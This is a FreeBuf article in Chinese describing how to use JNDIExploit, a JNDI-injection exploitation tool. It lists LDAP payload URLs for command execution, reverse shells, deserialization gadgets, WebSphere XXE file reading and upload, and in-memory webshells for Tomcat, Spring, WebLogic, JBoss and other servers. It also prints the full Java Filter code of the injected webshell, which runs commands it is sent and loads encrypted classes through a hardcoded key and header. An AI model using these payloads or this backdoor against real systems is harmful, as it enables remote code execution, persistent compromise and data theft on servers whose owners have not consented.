官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
JNDIExploit使用
Blackhand- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
JNDIExploit使用
一款用于 JNDI注入利用的工具,大量参考/引用了 Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
使用说明
使用 java -jar JNDIExploit.jar -h查看参数说明,其中 --ip参数为必选参数
Usage: java -jar JNDIExploit.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
Dockerfile
git clone https://github.com/feihong-cs/JNDIExploit.git
cd ./JNDIExploit
docker build -t jndiexploit .
docker run -it \
-p 1389:1389 \
-e LDAP_PORT=1389 \
-p 80:80 \
-e HTTP_PORT=80 \
jndiexploit使用 java -jar JNDIExploit.jar -u查看支持的 LDAP 格式
Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
ldap://127.0.0.1:1389/Basic/Command/[cmd]
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho
ldap://127.0.0.1:1389/Basic/TomcatMemshell1
ldap://127.0.0.1:1389/Basic/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/Basic/JettyMemshell
ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
ldap://127.0.0.1:1389/Basic/JBossMemshell
ldap://127.0.0.1:1389/Basic/WebsphereMemshell
ldap://127.0.0.1:1389/Basic/SpringMemshell
[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells
[+] TomcatBypass Queries
ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
[+] GroovyBypass Queries
ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
[+] WebsphereBypass Queries
ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
目前支持的所有 PayloadType为
Dnslog: 用于产生一个DNS请求,与DNSLog平台配合使用,对Linux/Windows进行了简单的适配Command: 用于执行命令,如果命令有特殊字符,支持对命令进行Base64编码后传输ReverseShell: 用于Linux系统的反弹shell,方便使用TomcatEcho: 用于在中间件为Tomcat时命令执行结果的回显,通过添加自定义headercmd: whoami的方式传递想要执行的命令SpringEcho: 用于在框架为SpringMVC/SpringBoot时命令执行结果的回显,通过添加自定义headercmd: whoami的方式传递想要执行的命令WeblogicEcho: 用于在中间件为Weblogic时命令执行结果的回显,通过添加自定义headercmd: whoami的方式传递想要执行的命令TomcatMemshell1: 用于植入Tomcat内存shell, 支持Behinder shell与Basic cmd shellTomcatMemshell2: 用于植入Tomcat内存shell, 支持Behinder shell与Basic cmd shell, 使用时需要添加额外的HTTP HeaderShell: true, 推荐使用此方式SpringMemshell: 用于植入Spring内存shell, 支持Behinder shell与Basic cmd shellWeblogicMemshell1: 用于植入Weblogic内存shell, 支持Behinder shell与Basic cmd shellWeblogicMemshell2: 用于植入Weblogic内存shell, 支持Behinder shell与Basic cmd shell,推荐使用此方式JettyMemshell: 用于植入Jetty内存shell, 支持Behinder shell与Basic cmd shellJBossMemshell: 用于植入JBoss内存shell, 支持Behinder shell与Basic cmd shellWebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shell与Basic cmd shell
目前支持的所有 GadgetType为
URLDNSCommonsBeanutils1CommonsBeanutils2CommonsCollectionsK1CommonsCollectionsK2C3P0Jdk7u21Jre8u20CVE_2020_2551CVE_2020_2883
WebsphereBypass中的 3 个动作:
list:基于XXE查看目标服务器上的目录或文件内容
upload:基于XXE的jar协议将恶意jar包上传至目标服务器的临时目录
rce:加载已上传至目标服务器临时目录的jar包,从而达到远程代码执行的效果(这一步本地未复现成功,抛java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.异常,有复现成功的小伙伴麻烦指导下)
内存shell说明
采用动态添加 Filter/Controller的方式,并将添加的Filter
移动至FilterChain的第一位
内存shell的兼容性测试结果请参考 memshell项目Basic cmd shell的访问方式为 /anything?type=basic&pass=[cmd]
Behinder shell的访问方式需要修改
冰蝎客户端(请参考 冰蝎改造之适配基于tomcat Filter的无文件webshell的方式二自行修改),并在访问时需要添加 X-Options-Ai头部,密码为rebeyond植入的 Filter 代码如下:
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
System.out.println("[+] Dynamic Filter says hello");
String k;
Cipher cipher;
if (servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")) {
k = servletRequest.getParameter("pass");
if (k != null && !k.isEmpty()) {
cipher = null;
String[] cmds;
if (File.separator.equals("/")) {
cmds = new String[]{"/bin/sh", "-c", k};
} else {
cmds = new String[]{"cmd", "/C", k};
}
String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter("\\A").next();
servletResponse.getWriter().println(result);
}
} else if (((HttpServletRequest)servletRequest).getHeader("X-Options-Ai") != null) {
try {
if (((HttpServletRequest)servletRequest).getMethod().equals("POST")) {
k = "e45e329feb5d925b";
((HttpServletRequest)servletRequest).getSession().setAttribute("u", k);
cipher = Cipher.getInstance("AES");
cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES"));
byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));
Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());
Object evilObject = evilClass.newInstance();
Method targetMethod = evilClass.getDeclaredMethod("equals", ServletRequest.class, ServletResponse.class);
targetMethod.invoke(evilObject, servletRequest, servletResponse);
}
} catch (Exception var10) {
var10.printStackTrace();
}
} else {
filterChain.doFilter(servletRequest, servletResponse);
}
}
本文为 Blackhand 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
![漏洞分析丨HEVD-0x4.PoolOverflow[win7x86]](https://image.3001.net/images/20220715/1657886718_62d157fe408707581c49b.png!small)
Blackhand LV.3
这家伙太懒了,还未填写个人描述!
- 7 文章数
- 2 关注者
Apache OFBiz 未授权远程代码执行(CVE-2023-51467)复现
2023-12-28
[CVE-2023-49070]Apache Ofbiz XML-RPC RCE-漏洞复现
2023-12-07
挖矿木马应急响应
2023-04-24
文章目录